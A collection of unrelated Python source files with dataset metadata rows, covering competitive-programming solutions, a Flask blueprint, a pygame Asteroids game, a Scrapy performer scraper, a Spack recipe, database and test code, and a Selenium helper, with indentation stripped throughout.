n = int(input())
s = input()
num = int(s, 2) # 元の2進数を数字に
opc = s.count('1') # 元の2進数のpopcount
# ±1したpopcountで余りを求めておく
if opc > 1:
num1 = num % (opc - 1)
else:
num1 = 0
num0 = num % (opc + 1)
for i in range(n):
if s[i] == '1':
if opc == 1:
print(0)
continue
tmp = (num1 - pow(2, n - 1 - i, opc - 1)) % (opc - 1)
else:
tmp = (num0 + pow(2, n - 1 - i, opc + 1)) % (opc + 1)
# binで2進数にしてpopcount求める
ans = 1
while tmp > 0:
tmp %= bin(tmp).count('1')
ans += 1
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02609/s532378622.py | s532378622.py | py | 699 | python | en | code | 0 | github-code | 90 |
7508580685 | from flask import Blueprint, request, jsonify, make_response, session
from sqlalchemy.orm import load_only
from ..student.models import *
from ..student.types import *
from ..student import util
staff = Blueprint("staff", __name__)
# API: staff-profile dashboard page
@staff.route("<variable>", methods=["GET"])
@util.staff_login_required
def staff_profile(variable):
session['staff_id'] = variable
db_val = db.session.query(Staff).filter(Staff.staff_id_no == variable).all()
staff_schema = StaffDashboardProfileSchema(many=True)
post_json = staff_schema.dump(db_val)
return jsonify({"data": post_json})
@staff.route("getTimeTable/<staff_id>", methods=["GET"])
@util.staff_login_required
def get_staff_time_table(staff_id):
# region professor timetable
if 'staff_id' in session:
print("SESSION EXISTS")
print(session["staff_id"])
staff = db.session.query(Staff).filter(Staff.staff_id_no == staff_id).options(load_only("id")).first()
staff_courses = [r[0] for r in db.session.query(Course)
.filter(Course.staff_id == staff.id).values("id")
]
staff_time_table = (db.session.query(Schedule,Course)
.join(Course, Schedule.courses)
.filter(Course.id.in_(staff_courses)).values("period","day","start_time","end_time","course_code"))
schd_schema = StaffScheduleSchema(many=True)
post_json = schd_schema.dump(staff_time_table)
print(post_json)
session.pop('staff_id', None)
return jsonify({"data": post_json})
# endregion
@staff.route("check_students", methods=["GET"])
@util.staff_login_required
def check_student_status():
# security framework will first check
# if the user is Staff or not
return make_response("jsonify()", 200)
| AnishTiwari/Attendance | attendancesystembackend/attendancesystem/attendancesystem/attendancesystem/staff/views.py | views.py | py | 1,802 | python | en | code | 0 | github-code | 90 |
72115927978 | import pygame
from pygame.locals import *
import math
import random
pygame.init()
default_font = pygame.font.get_default_font()
font16 = pygame.font.Font(default_font, 16)
clock = pygame.time.Clock()
screen_width = 800
screen_height = 600
class Player(pygame.sprite.Sprite):
def __init__(self):
# self.image = pygame.Surface((50, 50))
# self.image.fill((255, 255, 255))
super().__init__()
self.image = pygame.image.load('./plain-triangle.png')
self.image = pygame.transform.scale(self.image, (25, 40))
self.rect = self.image.get_rect()
self.rect.x = screen_width // 2
self.rect.y = screen_height // 2
self.rotated_image = self.image.copy()
self.rotation = 0
self.movement_speed = 5
def update(self, pressed_keys):
if pressed_keys[K_UP]:
new_x = self.movement_speed * math.sin(math.radians(self.rotation))
new_y = self.movement_speed * math.cos(math.radians(self.rotation))
if self.rect.x - new_x <= -5 or self.rect.x - new_x >= screen_width - 5:
return
if self.rect.y - new_y <= -5 or self.rect.y - new_y >= screen_height - 5:
return
self.rect.move_ip(-new_x, -new_y)
if pressed_keys[K_RIGHT]:
self.rotation = (self.rotation - 5) % 360
self.rotated_image = pygame.transform.rotate(self.image.copy(), self.rotation)
if pressed_keys[K_LEFT]:
self.rotation = (self.rotation + 5) % 360
self.rotated_image = pygame.transform.rotate(self.image.copy(), self.rotation)
def get_center(self):
return self.rect.x + 0.5 * 25, self.rect.y + 0.5 * 40
class Bullet(pygame.sprite.Sprite):
def __init__(self, initial_pos, angle):
super().__init__()
self.image = pygame.Surface((5, 5))
self.image.fill((0, 0, 0))
self.rect = self.image.get_rect()
self.rect.x = initial_pos[0]
self.rect.y = initial_pos[1]
self.angle = angle
self.movement_speed = 8
def update(self):
new_x = self.movement_speed * math.sin(math.radians(self.angle))
new_y = self.movement_speed * math.cos(math.radians(self.angle))
self.rect.move_ip(-new_x, -new_y)
if self.rect.x > 800 or self.rect.y < 0:
self.kill()
class Asteroid(pygame.sprite.Sprite):
def __init__(self, position, health = 4):
super().__init__()
self.health = health
self.image = pygame.image.load('./asteroid.png')
size = self.health_to_dimensions()
self.image = pygame.transform.scale(self.image, size)
self.rect = self.image.get_rect()
self.rect.x = position[0]
self.rect.y = position[1]
direction_x = (screen_width // 2 - position[0])
direction_y = (screen_height // 2 - position[1])
magnitude = math.sqrt((direction_x ** 2) + (direction_y ** 2))
magnitude = 1 if magnitude == 0 else magnitude
self.direction = (direction_x / magnitude, direction_y / magnitude)
self.movement_speed = 4
def health_to_dimensions(self):
if self.health == 1:
return 20, 20
if self.health == 2:
return 30, 30
if self.health == 3:
return 40, 40
if self.health == 4:
return 50, 50
if self.health == 5:
return 60, 60
def update(self):
self.rect.move_ip(self.direction[0] * self.movement_speed,
self.direction[1] * self.movement_speed)
def hit_by_bullet(self):
self.health = self.health - 1
if self.health == 0:
self.kill()
return
size = self.health_to_dimensions()
self.image = pygame.transform.scale(self.image, size)
def get_new_random_asteroid_pos():
x_direction = random.randint(0, 2)
y_direction = random.randint(0, 2)
if x_direction == 1:
rand_x = random.randint(screen_width, screen_width + 100)
elif x_direction == 2:
rand_x = random.randint(-100, 0)
else:
rand_x = screen_width // random.randint(1, 5)
if y_direction == 1:
rand_y = random.randint(screen_height, screen_height + 100)
elif y_direction == 2:
rand_y = random.randint(-100, 0)
else:
rand_y = screen_height // random.randint(1, 5)
return rand_x, rand_y
screen = pygame.display.set_mode((800, 600))
def game_loop():
ADD_ASTEROID = pygame.USEREVENT + 1
pygame.time.set_timer(ADD_ASTEROID, 2000)
player = Player()
bullets = pygame.sprite.Group()
asteroids = pygame.sprite.Group()
running = True
# make a limit on asteroids
player_points = 0
while running:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
exit(0)
elif event.type == KEYDOWN:
if event.key == K_SPACE:
pos = player.get_center()
angle = player.rotation
bullet = Bullet(pos, angle)
bullets.add(bullet)
elif event.type == ADD_ASTEROID:
rand_x, rand_y = get_new_random_asteroid_pos()
asteroid = Asteroid((rand_x, rand_y), health=random.randint(1, 5))
asteroids.add(asteroid)
pressed_keys = pygame.key.get_pressed()
player.update(pressed_keys)
# if pressed_keys[K_SPACE]:
# pos = player.get_center()
# angle = player.rotation
# bullet = Bullet(pos, angle)
# bullets.add(bullet)
for _, asteroid_list in pygame.sprite.groupcollide(bullets, asteroids, True, False).items():
for asteroid in asteroid_list:
asteroid.hit_by_bullet()
player_points = player_points + 1
if pygame.sprite.spritecollideany(player, asteroids):
running = False
screen.fill((255, 255, 255))
for bullet in bullets:
bullet.update()
screen.blit(bullet.image, bullet.rect)
for asteroid in asteroids:
asteroid.update()
screen.blit(asteroid.image, asteroid.rect)
text = font16.render('Player score {}'.format(player_points), True, (0, 0, 0), None)
screen.blit(text, (10, 550))
screen.blit(player.rotated_image, player.rect)
pygame.display.flip()
clock.tick(30)
def replay_screen():
text = font16.render("Game over - press space to start over", True, (0, 0, 0), None)
while True:
for event in pygame.event.get():
if event.type == QUIT:
exit(0)
elif event.type == KEYDOWN:
if event.key == K_SPACE:
return False
rect = text.get_rect()
rect.center = (screen_width // 2, screen_height // 2)
screen.fill((255, 255, 255))
screen.blit(text, rect)
pygame.display.flip()
game_done = False
while not game_done:
game_loop()
game_done = replay_screen() | BrandtRobert/PythonCrashCourse | Asteroids/asteroids.py | asteroids.py | py | 7,122 | python | en | code | 0 | github-code | 90 |
5599272334 | import sys
def circle_area():
# inputs
N = int(sys.stdin.readline())
points = [None] * (2 * N)
for i in range(N):
center, radius = list(map(int, sys.stdin.readline().split()))
points[2*i] = (center - radius, 'l') # left point
points[2*i+1] = (center + radius, 'r') # right point
# sort points: x-coordinates in ascending order
# 'l', 'r': decending order ; 'r', 'l' order
points.sort(key=lambda x: (-x[0], x[1]), reverse=True)
# count closed area
cnt = 0
stack = []
for i in range(2 * N):
# (a, 'r') (b, 'r') r, r연속으로 나왔을 때 연결 여부 탐색 시작 --> l, l 연속으로 나올 때까지
if points[i][1] =='r' and stack[-1][1] == 'r':
is_connected = True
curr = stack.pop()
# 처음이 끊어졌는지 확인
if points[i][0] != curr[0]:
is_connected = False
# (a, 'l') (b, 'l') l,l연속으로 나올 때까지 pop하면서 연결 여부 파악
while not(curr[1] == 'l' and stack[-1][1] == 'l'):
if curr[1] == 'l' and curr[0] != stack[-1][0]:
is_connected = False
curr = stack.pop()
# 마지막이 끊어졌는지 확인
if curr[1] == 'l' and curr[0] != stack[-1][0]:
is_connected = False
# 탐색 종료시 연결되었으면 cnt++
if is_connected:
cnt += 1
stack.append(points[i])
return N + 1 + cnt
print(circle_area()) | jinhyung-noh/algorithm-ps | BaekJoon/10000_원영역.py | 10000_원영역.py | py | 1,597 | python | ko | code | 0 | github-code | 90 |
13090908955 | def isPossible(limit, nDays, mChapters, times):
dayCount = 1
allocation = 0
for t in times:
if t > limit:
return False
if allocation + t > limit:
dayCount += 1
allocation = t
else:
allocation += t
if dayCount > nDays:
return False
return True
def ayushGivesNinjatest(n, m, time):
# Write your code here.
low, high = min(time), sum(time)
while low <= high:
mid = (low + high) // 2
if isPossible(mid, n, m, time):
high = mid - 1
else:
low = mid + 1
return low
| magdumsuraj07/data-structures-algorithms | questions/striever_SDE_sheet/67_allocate_minimum_number_of_pages.py | 67_allocate_minimum_number_of_pages.py | py | 624 | python | en | code | 0 | github-code | 90 |
9688161173 | from typing import Sequence
from dataclasses import dataclass
from datetime import datetime
from sqlalchemy import select
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import AsyncSession
from utils.db_api.base import Base
from utils.db_api.models import Users, Projects
class Database:
async def load(self) -> AsyncSession:
engine = create_async_engine(
"sqlite+aiosqlite:///database.db",
future=True
)
async with engine.begin() as conn:
await conn.run_sync(Base.metadata.create_all)
async_sessionmaker = sessionmaker(
engine, expire_on_commit=False, class_=AsyncSession
)
self.async_session = async_sessionmaker
# ---Users---
async def reg_user(self, user_id: str, username: str, first_name: str):
"""Some docs"""
async with self.async_session() as session:
session: AsyncSession
await session.merge(
Users(
user_id=user_id,
username=username,
first_name=first_name
)
)
await session.commit()
async def get_user(self, user_id) -> Users:
"""Some docs"""
async with self.async_session() as session:
session: AsyncSession
response = await session.get(Users, user_id)
return response
# ---Projects---
async def reg_project(self, title: str, description: str, demo: str, github: str):
"""Some docs"""
async with self.async_session() as session:
session: AsyncSession
await session.merge(
Projects(
title=title,
description=description,
demo=demo,
github=github
)
)
await session.commit()
async def get_all_projects(self) -> Sequence[Projects]:
"""Some docs"""
async with self.async_session() as session:
session: AsyncSession
response = await session.execute(select(Projects))
return response.scalars().all()
| KarimovMurodilla/about-me-bot | utils/db_api/connection.py | connection.py | py | 2,258 | python | en | code | 0 | github-code | 90 |
43193187255 | import pandas as pd
import numpy as np
def annotate(chr_, start, end):
result = []
for i in range(0, len(chrom)):
if str(chr_) == str(chrom[i]):
if start <= float(s_[i]) and end >= float(e_[i]):
result.append(name[i])
return result, len(result)
df = pd.read_csv('real/AR/CRC01/inferred_prof.csv', sep = ',')
chr_ = pd.read_csv('real/CNV_data/SegFixed_withFormalName_usedInScience.xls', sep = '\t')
df['CHR'], df['start'], df['end'] = chr_['CHR'], chr_['START'], chr_['END']
df = df[df['node6'] != df['node9']]
df = df[['CHR','start','end', 'node6','node9']]
source = pd.read_csv("real/colorectal.csv")
name = source['Gene Symbol']
chrom = source['Chr']
s_ = source['start']
e_ = source['end']
chrom = [23 if x=='X' else x for x in chrom]
chrom = [24 if x=='Y' else x for x in chrom]
selected_chrom = [1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]
gene = []
end = 0
first = 0
for index, row in df.iterrows():
chr_, s, e = int(row['CHR'][3:]), int(row['start']), int(row['end'])
if first == 0:
c_ = chr_
if c_ in set(selected_chrom) or chr_ in set(selected_chrom):
#print(chr_)
if first == 0:
#print('new events', num)
start = s
end = e
#ad = num
if first == 1:
if s == end + 1:
end = e
else:
#if num != ad and c_ == 9 and num == 3:http://localhost:8890/notebooks/Documents/research_tempruns/BD_output/real_gene.ipynb#
print(c_, start, end)
out, counter = annotate(c_, start, end)
print(','.join(out))
if counter !=0:
print('')
for i in range(0, counter):
gene.append(out[i])
start = s
end = e
c_ = chr_
#ad = num
first = 1
| Androstane/NestedBD | scripts_plots/annotate_gene.py | annotate_gene.py | py | 1,937 | python | en | code | 4 | github-code | 90 |
17937105439 | import bisect
n, *lst = map(int, open(0).read().split())
alst = sorted(lst[:n])
blst = lst[n:2*n]
clst = sorted(lst[2*n:])
res = 0
for i in blst:
a = bisect.bisect_left(alst, i)
c = n - bisect.bisect_right(clst, i)
res += a * c
print(res) | Aasthaengg/IBMdataset | Python_codes/p03559/s636243077.py | s636243077.py | py | 245 | python | en | code | 0 | github-code | 90 |
42267550104 | # 문제: 켜져 있는 전구의 밝기 최댓값 구하기
# 조건: 1) 1 <= N <= 200000
# 2) 전구는 꺼져있거나(0) 켜져있거나(1)
# 3) 1 <= 전구의 밝기 <= 5000
# 4) 연속한 전구를 한 개 이상 선택해서 뒤집을 수 있는데 딱 한번만 가능
# 방법: 1) 누적합 방식을 통해서 최대갑 구하기
# 2) 누적된 값이 음수가 되면 0으로 초기화
# 3) maxB가 0일 경우 모든 전구를 안 뒤집는 것이 최대값이기에 가장 작은 값을 뒤집어서 조건 충족
# 4) maxB가 존재할 경우 기존의 값에서 maxB를 더해 최대 밝기 구하기
import sys
input = sys.stdin.readline
N = int(input())
bulbs = list(map(int, input().split()))
on_off = list(map(int, input().split()))
tot = sum([bulbs[i] for i in range(N) if on_off[i]])
ans = 0
maxB = 0
# 방법 1
for i in range(N):
if not on_off[i]:
ans += bulbs[i]
else:
ans -= bulbs[i]
# 방법 2
if ans < 0:
ans = 0
maxB = max(maxB, ans)
# 방법 3
if maxB == 0:
print(tot - min(bulbs))
# 방법 4
else:
print(tot + maxB)
| junhong625/TIL | Algorithm/Baekjoon/Gold/[25634번] 전구 상태 뒤집기.py | [25634번] 전구 상태 뒤집기.py | py | 1,135 | python | ko | code | 2 | github-code | 90 |
44123381190 | #!/usr/bin/python
#----------------- For Part 2 ---------------------
# Function to return an array of summed numbers
def three_meas_window(input):
three_meas = []
for i in range(len(input)-2):
three_meas.append(input[i] + input[i+1] + input[i+2])
return three_meas
#----------------- For Part 1 ---------------------
# Function to return the number of times the depth
# increases
def depth_increase_count(input):
count = 0
previous_number = 0
for num in input:
if previous_number == 0:
previous_number = num
elif previous_number < num:
count += 1
previous_number = num
elif previous_number >= num:
previous_number = num
return count
# Open the input file and read into string array
input_file = open('input.txt')
input_text = input_file.read().split('\n')
# Convert to int array
# Using inline if to handle the blank line. Future implement should handle blank
# lines before this step.
input_num = [int( n if n != '' else 0) for n in input_text]
# Display on screen
print(depth_increase_count(three_meas_window(input_num))) | Dowscope/Advent-Of-Code | 2021/Day1/day1.py | day1.py | py | 1,140 | python | en | code | 0 | github-code | 90 |
34120220755 | """Overview plots of transcet"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import linregress
from os.path import join
from src import Config
plt.ion()
cf = Config()
savedir = 'reports/jasa/figures'
inputed = np.load('data/processed/inputed_decomp.npz')
lvls = inputed['filled_lvls']
stable_lvls = inputed['stable_spice_lvls']
sigma = inputed['sig_lvls']
x_a = inputed['x_a']
# plot sigma, tau
#min_x = 50
#max_x = 250
#call_lvls = [39, 48, 54]
min_x = 200
max_x = 300
call_lvls = [34, 36, 42, 44]
#min_x = 200
#max_x = 400
#call_lvls = [38, 41, 50]
fig, ax = plt.subplots(figsize=(cf.jasa_1clm, 2))
x_i = x_a < max_x * 1e3
for lbl_i in call_lvls:
ax.plot(x_a / 1e3, lvls[0, lbl_i, :].T, color='k', linewidth=1)
plt_height = stable_lvls[0, lbl_i, :]
plt_inds = plt_height > 1e-5
ax.plot(x_a[plt_inds] / 1e3, plt_height[plt_inds], color='#be0119', alpha=0.6)
"""
cc0 = ['0.6', '0.4', '0.2']
z_off = [-10, -5, 0]
for zo, c0, lbl_i in zip(z_off, cc0, call_lvls):
plt_height = stable_lvls[0, lbl_i, :]
plt_inds = plt_height > 1e-5
ax.plot(x_a[plt_inds] / 1e3, plt_height[plt_inds], color='#be0119', alpha=0.6)
ax.plot(x_a / 1e3, lvls[0, lbl_i, :].T, color=c0)
ax.text(max_x + 3., lvls[0, lbl_i, x_i][-1] + zo,
f'{sigma[lbl_i]:.2f}', va='center', color=c0)
"""
ax.set_ylim(130, 0)
ax.set_xlim(min_x, max_x)
pos = ax.get_position()
pos.x1 -= 0.07
pos.x0 += 0.10
pos.y1 += 0.08
pos.y0 += 0.06
ax.set_position(pos)
ax.set_ylabel('Depth (m)')
ax.text(max_x - 3., 10, '$\sigma$', va='center')
ax.text(max_x - 3., 30, '(kg/m$^3$)', va='center')
ax.text(min_x - 25., 5, '(a)', bbox=cf.bbox)
ax.spines["right"].set_visible(False)
ax.spines["top"].set_visible(False)
#ax[0].xaxis.set_ticks_position('bottom')
#ax[0].yaxis.set_ticks_position('left')
fig.savefig(join(savedir, 'sig_tau_interp.png'), dpi=300)
| nedlrichards/tau_decomp | notebooks/isopycnals.py | isopycnals.py | py | 1,891 | python | en | code | 0 | github-code | 90 |
1249407832 | import scrapy
import re
from datetime import datetime
from dateutil.relativedelta import relativedelta
import dateparser
from urllib.parse import urlparse
from tpdb.BasePerformerScraper import BasePerformerScraper
class BellaPassnPerformerSpider(BasePerformerScraper):
selector_map = {
'name': '//div[@class="profile-details clear"]/h3/text()',
'image': '//div[@class="profile-pic"]/img/@src0_1x',
'birthplace': '//p[@class="mb-1 mt-3"]/a/span/text()',
'nationality': '//td/li/strong[contains(text(),"Ethnicity")]/../../following-sibling::td/text()',
'ethnicity': '//td/li/strong[contains(text(),"Ethnicity")]/../../following-sibling::td/text()',
'eyecolor': '//td/li/strong[contains(text(),"Eye Color")]/../../following-sibling::td/text()',
'haircolor': '//td/li/strong[contains(text(),"Hair Color")]/../../following-sibling::td/text()',
'height': '//td/li/strong[contains(text(),"Height")]/../../following-sibling::td/text()',
'measurements': '//td/li/strong[contains(text(),"Stats")]/../../../td/text()',
'tattoos': '//td/li/strong[contains(text(),"Tattoos")]/../../../td/text()',
'piercings': '//td/li/strong[contains(text(),"Piercings")]/../../../td/text()',
'birthday': '//td/li/strong[contains(text(),"Birthdate")]/../../following-sibling::td/text()',
'bio': '//div[@class="profile-about"]/p/text()',
'aliases': '//p[@data-test="p_aliases"]/text()',
'pagination': '/models/%s/name/',
'external_id': 'models/(.+).html$'
}
name = 'BellaPassPerformer'
network = 'Bella Pass'
parent = 'Bella Pass'
start_urls = [
'https://alexismonroe.com',
'https://avadawn.com',
'https://bellahd.com',
'https://bellanextdoor.com',
'https://bryci.com',
'https://calicarter.com',
'https://hd19.com',
'https://hunterleigh.com',
'https://janafox.com',
'https://joeperv.com',
'https://katiebanks.com',
'https://monroelee.com',
'https://taliashepard.com',
]
def get_gender(self, response):
return 'Female'
def get_performers(self, response):
performers = response.xpath('//div[@class="item-portrait"]/a/@href').getall()
for performer in performers:
#performer = performer.replace("//", "")
yield scrapy.Request(
url=self.format_link(response, performer),
callback=self.parse_performer
)
def get_cupsize(self, response):
if 'cupsize' in self.selector_map:
cupsize = self.process_xpath(response, self.get_selector_map('cupsize')).get().strip().replace("-","")
return cupsize
return ''
def get_ethnicity(self, response):
if 'ethnicity' in self.selector_map:
ethnicity = self.process_xpath(response, self.get_selector_map('ethnicity')).get()
if ethnicity:
if "," in ethnicity:
ethnicity = ethnicity.split(",")[0]
return ethnicity.strip()
return ''
def get_nationality(self, response):
if 'nationality' in self.selector_map:
nationality = self.process_xpath(response, self.get_selector_map('nationality')).get()
if nationality:
if "," in nationality:
nationality = nationality.split(",")[1]
return nationality.strip()
else:
nationality = response.xpath('//td/li/strong[contains(text(),"Lives In")]/../../following-sibling::td/text()').get()
if nationality:
return nationality.strip()
return ''
def get_height(self, response):
if 'height' in self.selector_map:
height = self.process_xpath(response, self.get_selector_map('height')).get()
if height:
str_height = re.findall('(\d{1,2})', height)
if len(str_height):
feet = int(str_height[0])
if len(str_height) > 1:
inches = int(str_height[1])
else:
inches = 0
heightcm = str(round(((feet*12)+inches) * 2.54)) + "cm"
return heightcm.strip()
return ''
def get_cupsize(self, response):
if 'measurements' in self.selector_map:
measurements = self.process_xpath(response, self.get_selector_map('measurements')).get()
if measurements:
measurements = measurements.replace(" ","").strip()
measurements = re.search('(.*-\d{2}-\d{2})', measurements).group(1)
if measurements:
cupsize = re.search('(.*?)-.*', measurements).group(1)
if cupsize:
return cupsize.upper().strip()
return ''
def get_measurements(self, response):
if 'measurements' in self.selector_map:
measurements = self.process_xpath(response, self.get_selector_map('measurements')).get()
if measurements:
measurements = measurements.replace(" ","").strip()
measurements = re.search('(.*-\d{2}-\d{2})', measurements).group(1)
if measurements:
return measurements.upper().strip()
return ''
def get_birthday(self, response):
if 'birthday' in self.selector_map:
birthday = self.process_xpath(response, self.get_selector_map('birthday')).get()
if birthday:
checkbirthday = re.search('(.*?)\s+(\d+).*(\d{4})', birthday)
if checkbirthday:
if checkbirthday[3]:
if len(checkbirthday[2]) == 3:
tempday = checkbirthday[2]
tempday = tempday[1:]
birthday = checkbirthday[1] + " " + tempday + ", " + checkbirthday[3]
return dateparser.parse(birthday.strip()).isoformat()
return ''
def get_image(self, response):
url = urlparse(response.url)
base = url.scheme + "://" + url.netloc
if 'image' in self.selector_map:
image = base + self.process_xpath(response, self.get_selector_map('image')).get()
if image:
return image.strip()
return ''
| SFTEAM/scrapers | performers/networkBellaPassPerformer.py | networkBellaPassPerformer.py | py | 6,541 | python | en | code | null | github-code | 90 |
27092636028 | from spack import *
class Openscenegraph(CMakePackage):
"""OpenSceneGraph is an open source, high performance 3D graphics toolkit
that's used in a variety of visual simulation applications."""
homepage = "http://www.openscenegraph.org"
url = "http://trac.openscenegraph.org/downloads/developer_releases/OpenSceneGraph-3.2.3.zip"
version('3.2.3', '02ffdad7744c747d8fad0d7babb58427')
version('3.1.5', '1c90b851b109849c985006486ef59822')
variant('shared', default=True, description='Builds a shared version of the library')
depends_on('cmake@2.8.7:', type='build')
depends_on('qt@4:')
depends_on('zlib')
def cmake_args(self):
spec = self.spec
shared_status = 'ON' if '+shared' in spec else 'OFF'
args = [
'-DDYNAMIC_OPENSCENEGRAPH={0}'.format(shared_status),
'-DDYNAMIC_OPENTHREADS={0}'.format(shared_status),
'-DZLIB_INCLUDE_DIR={0}'.format(spec['zlib'].prefix.include),
'-DZLIB_LIBRARY={0}/libz.{1}'.format(spec['zlib'].prefix.lib,
dso_suffix),
'-DBUILD_OSG_APPLICATIONS=OFF',
'-DOSG_NOTIFY_DISABLED=ON',
'-DLIB_POSTFIX=',
]
# NOTE: This is necessary in order to allow OpenSceneGraph to compile
# despite containing a number of implicit bool to int conversions.
if spec.satisfies('%gcc'):
args.extend([
'-DCMAKE_C_FLAGS=-fpermissive',
'-DCMAKE_CXX_FLAGS=-fpermissive',
])
return args
| matzke1/spack | var/spack/repos/builtin/packages/openscenegraph/package.py | package.py | py | 1,599 | python | en | code | 2 | github-code | 90 |
3967803474 | ###########################################################################
#
#Author:Manali Milind Kulkarni
#Date:28th March 2021
#About: Implementing Decision Tree on Demo Dataset
#Note: This is sytematic code which uses main function,a machine Learning function and starter code
#
###########################################################################
#Required import
from sklearn import tree
###########################################################################
#Helper Function
def MarvellousMl(weight,surface):
#Step 1 n 2
#Rough : 1 Smooth:0
Features = [[35,1],[47,1],[90,0],[48,1],[90,0],[35,1],[92,0],[35,1],[35,1],[35,1],
[96,0],[43,1],[110,0],[35,1],[95,0]]
#1: Tennis 2:Cricket
Labele = [1,1,2,1,2,1,2,1,1,1,2,1,2,1,2]
#Step 3
dobj = tree.DecisionTreeClassifier()
#Step 4
dobj.fit(Features,Labele)
#Step 5
result = dobj.predict([[weight,surface]])
if result == 1:
print("Your object looks like Tennis Ball")
else:
print("Your object looks like Cricket Ball")
############################################################################
#Entry Point Function
def main():
print("-------------------------Supervised Machine Learning----------------------------")
weight = int(input("Enter weight: "))
surface = input("Enter surface: ")
#For programmer convinience converting all input to lowercase so that program won't get confused
if surface.lower() == "rough":
surface = 1
elif surface.lower() == "smooth":
surface = 0
else:
print("Invalid Input")
return
MarvellousMl(weight,surface)
###########################################################################
#Starter
if __name__ == '__main__':
main()
| ManaliKulkarni30/MachineLearning_CaseStudues | Balls3.py | Balls3.py | py | 1,843 | python | en | code | 0 | github-code | 90 |
5544477032 | # 치즈
# 복습 횟수:1, 01:00:00, 복습필요O
from collections import deque
import sys
si = sys.stdin.readline
dx = [-1,1,0,0]
dy = [0,0,-1,1]
N, M = map(int, si().split())
graph = [list(map(int, si().split())) for _ in range(N)]
time = 0
answer = []
def find_air():
cnt = 0
visited = [[0 for _ in range(M)] for _ in range(N)]
q = deque()
q.append([0, 0])
visited[0][0] = 1 # 방문처리
while q:
x, y = q.popleft()
for idx in range(4):
nx = x + dx[idx]
ny = y + dy[idx]
if not (0 <= nx < N and 0 <= ny < M): continue
if visited[nx][ny]: continue
if visited[nx][ny] == 0 and graph[nx][ny] == 0:
q.append([nx, ny])
if visited[nx][ny] == 0 and graph[nx][ny] == 1:
graph[nx][ny] = 0 # 산화
cnt += 1
visited[nx][ny] = 1 # 방문처리
answer.append(cnt)
return cnt
while True:
cnt = find_air()
if cnt == 0:
break
time += 1
print(time)
print(answer[-2]) | SteadyKim/Algorism | language_PYTHON/백준/BJ2636.py | BJ2636.py | py | 1,109 | python | en | code | 0 | github-code | 90 |
1973900226 | import sys
N,M=map(int,sys.stdin.readline().split()) #N:세로, M:가로
c_rule=["BWBWBWBW","WBWBWBWB"]
chess=[0 for i in range(N)]
result=64
for i in range(N):
M_line=sys.stdin.readline().replace('\n','')
chess[i]=(M_line)
for j in range(M-7):
for i in range(N-7):
b_cnt=0
w_cnt=0
cnt=0
for h in range(8):
for w in range(8):
if c_rule[0][w]!=chess[i+h][j+w]:
b_cnt+=1
if c_rule[1][w]!=chess[i+h][j+w]:
w_cnt+=1
cnt=min(b_cnt,w_cnt)
c_rule.reverse()
if cnt<result:
result=cnt
print(result) | seminss/algorithm-study | solvedac/브루트포스 알고리즘/1018 체스판 다시 칠하기.py3 | 1018 체스판 다시 칠하기.py3 | py3 | 669 | python | en | code | 0 | github-code | 90 |
29737648465 | import pytest
from bach import SeriesDict
from bach.expression import Expression
from sql_models.util import DatabaseNotSupportedException, is_bigquery, is_postgres
from tests.unit.bach.util import get_fake_df_test_data
def test_db_not_supported_error_on_not_supported_db(dialect):
df = get_fake_df_test_data(dialect=dialect)
# Creating a SeriesDict should work on BigQuery, and should give a clear error on Postgres.
# wrap call in function, so it's super clear we test the same statements for all dialects
def call_to_init():
# This is not the 'normal' way to create a Series for the end-user, but it should give a clear error
# none the less.
return SeriesDict(
engine=df.engine,
base_node=df.base_node,
index=df.index,
name='test',
expression=Expression.construct('NULL'),
group_by=None,
order_by=[],
instance_dtype={'a': 'int64'},
)
def call_from_value():
# more 'normal' way to create a Series
struct = {'a': 123, 'b': 'test'}
dtype = {'a': 'int64', 'b': 'string'}
return SeriesDict.from_value(base=df, value=struct, name='struct', dtype=dtype)
def call_supported_value_to_literal():
return SeriesDict.supported_value_to_literal(dialect, {'a': 123}, {'a': 'int64'})
if is_bigquery(dialect):
df['x'] = call_to_init()
df['y'] = call_from_value()
expr = call_supported_value_to_literal()
if is_postgres(dialect):
match = 'SeriesDict is not supported for database dialect postgresql'
with pytest.raises(DatabaseNotSupportedException, match=match):
df['x'] = call_to_init()
with pytest.raises(DatabaseNotSupportedException, match=match):
df['y'] = call_from_value()
with pytest.raises(DatabaseNotSupportedException, match=match):
expr = call_supported_value_to_literal()
| massimo1220/objectiv-analytics-main | bach/tests/unit/bach/test_series_dict.py | test_series_dict.py | py | 1,971 | python | en | code | 5 | github-code | 90 |
74038016297 | #!/usr/bin/python
import setuptools
with open("requirements.txt") as f:
required = f.read().splitlines()
setuptools.setup(
name="brendon-useful",
version="1.0",
packages=setuptools.find_packages(),
install_requires=required,
entry_points={
"console_scripts": [
"useful_renamer = renamer:main",
"useful_duplicator = duplicator:main",
"useful_chat = chat:main",
],
},
include_package_data=True,
)
| brendonmatos/useful | setup.py | setup.py | py | 483 | python | en | code | 0 | github-code | 90 |
22132292166 | # -*- coding: utf-8 -*-
from selenium import webdriver
class ImageElement(object):
def __init__(self, parent, x, y, width, height):
"""
Create a new ImageElement.
:Args:
- parent: The WebDriver.
- x: location of the element on the X axis.
- y: location of the element on the Y axis.
- width: the width of the element.
- height: the height of the element.
"""
self._parent = parent
self._location = {"x": x, "y": y}
self._size = {"width": width, "height": height}
self._rect = {"x": x, "y": y, "width": width, "height": height}
@property
def parent(self):
"""Internal reference to the WebDriver instance this element was found from."""
return self._parent
@property
def location(self):
"""The location of the element in the renderable canvas."""
return self._location
@property
def size(self):
"""The size of the element."""
return self._size
@property
def rect(self):
"""A dictionary with the size and location of the element."""
return self._rect
def move_to(self):
"""
Move the mouse to the center of the specified element.
"""
self.__move_and_click(None, None, False)
def move_at(self, xoffset, yoffset):
"""
Move the mouse by an offset of the specified element.
Offsets are relative to the top-left corner of the element.
:Args:
- xoffset: X offset to move to.
- yoffset: Y offset to move to.
"""
self.__move_and_click(xoffset, yoffset, False)
def click(self):
"""
Move the mouse to the center of the specified element and click.
"""
self.__move_and_click(None, None, True)
def click_at(self, xoffset, yoffset):
"""
Move the mouse by an offset of the specified element and click.
Offsets are relative to the top-left corner of the element.
:Args:
- xoffset: X offset to move to.
- yoffset: Y offset to move to.
"""
self.__move_and_click(xoffset, yoffset, True)
